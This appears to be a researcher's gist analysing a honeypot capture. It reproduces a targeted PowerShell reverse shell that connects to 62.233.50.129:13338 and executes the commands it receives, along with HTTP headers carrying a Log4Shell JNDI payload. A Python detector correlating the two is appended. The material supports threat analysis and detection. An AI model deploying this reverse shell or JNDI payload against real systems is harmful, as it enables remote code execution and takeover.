@yassirlaaouissi
Created July 4, 2022 16:18
Honeypot BioMCN
####
#### Step 1: Host and domain enumeration
####
$wer = Get-WMIObject Win32_ComputerSystem| Select-Object -ExpandProperty Domain;
###|
###| Unknown comments below
###|
#Aqua 1 1 1 1 1 1 1 1 1 2 2 2 22 2 2 2 2 2 print
#Aqua1 1 1 1 1 1 1 1 1 111 print
## If the Windows domain does not equal biomcn.eu, then the shell does not execute.
## Appears to be a targeted attack. See the following.
###
### Step 2: Domain Identification
### (output expected false; trust but verify)
###
$arrar = @('biomcn.eu');
if($arrar.Contains($wer.ToLower())){
Write-Output "true"
} else {
Write-Output "false"
}
###
### Original script will enter into this while loop if the Windows domain name
### is biomcn.eu
###
while($true) {
#initiate 2424 connection
$rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
$strmn = $rconns.GetStream()
#Aqua print
#Aqua p343rint
[byte[]]$btsofarr = 0..65535|%{0}
while(($i = $strmn.Read($btsofarr, 0, $btsofarr.Length)) -ne 0) {
###
### Unknown comments below.
###
#Aqua p23425rint
#Aqua723465 print
$backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 | Out-String )
$backs2 = $backs12 + "O"+"U"+"T " + (pwd).Path + " >> "
$bytetoout = ([text.encoding]::ASCII).GetBytes($backs2);
Start-Sleep -Seconds 0
## More unknown comments.
#Aqua 6352533print
#Aqua 2315print
$strmn.Write($bytetoout,0,$bytetoout.Length)
$strmn.Flush()
Start-Sleep -Seconds 1
}
$rconns.Close()
Start-Sleep -Seconds 3
}
}
yassirlaaouissi commented Jul 4, 2022

HTTP Headers:
 ('Host', '')
 ('X-Forwarded-For', ', 62.233.50.129')
 ('X-Forwarded-Proto', 'https')
 ('Connection', 'close')
 ('User-Agent', 'Mozilla/5.0 ((63bf99fa-475d-4e0a-930b-a5f694d4992d))')
 ('Accept-Language', '${jndi:ldap://62.233.50.129:1390/o=tomcat}') 
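An added detection check, not part of the gist or of the captured script, that ties the two artefacts above together: it pulls the JNDI callback out of the honeypot headers, pulls the C2 host and port out of the PowerShell stage, and reports whether both point at the same host. The header and script samples are copied from this page and embedded inline so it runs offline; the regexes are my assumptions about the pattern shape, not a signature from any vendor.

```python
import re

# Constructed sample input: the headers and script fragment captured above.
HEADERS = [
    ("X-Forwarded-For", ", 62.233.50.129"),
    ("User-Agent", "Mozilla/5.0 ((63bf99fa-475d-4e0a-930b-a5f694d4992d))"),
    ("Accept-Language", "${jndi:ldap://62.233.50.129:1390/o=tomcat}"),
]
SCRIPT = '''$rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
$strmn = $rconns.GetStream()
$backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 | Out-String )'''

# Plain ${jndi:scheme://host[:port]...} lookups. Assumption: this shape only;
# nested-lookup obfuscations such as ${${lower:j}ndi:...} need a normaliser first.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^:/}]+)(?::(\d+))?", re.IGNORECASE)
# Outbound socket in the PowerShell stage: TCPClient("host", port)
TCPCLIENT_RE = re.compile(r'TCPClient\("([^"]+)",\s*(\d+)\)', re.IGNORECASE)


def find_jndi(headers):
    """Return (header, scheme, host, port) for every header carrying a JNDI lookup."""
    hits = []
    for name, value in headers:
        m = JNDI_RE.search(value)
        if m:
            port = int(m.group(3)) if m.group(3) else None
            hits.append((name, m.group(1).lower(), m.group(2), port))
    return hits


def find_reverse_shell(script):
    """Flag the stage-2 pattern: TCPClient + GetStream + iex of data read from the socket."""
    m = TCPCLIENT_RE.search(script)
    uses_iex = re.search(r"\biex\b|Invoke-Expression", script, re.IGNORECASE) is not None
    uses_stream = "GetStream()" in script
    if m and uses_iex and uses_stream:
        return (m.group(1), int(m.group(2)))
    return None


def correlate(headers, script):
    """Report the JNDI hits, the reverse-shell endpoint, and any host they share."""
    jndi = find_jndi(headers)
    shell = find_reverse_shell(script)
    shell_hosts = {shell[0]} if shell else set()
    shared = sorted({h for _, _, h, _ in jndi} & shell_hosts)
    return {"jndi": jndi, "reverse_shell": shell, "shared_hosts": shared}
```

For the sample above, `correlate` returns 62.233.50.129 as the shared host, which is the kind of link a SOC analyst would use to pivot from the inbound Log4Shell probe to the outbound C2 connection on port 13338.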
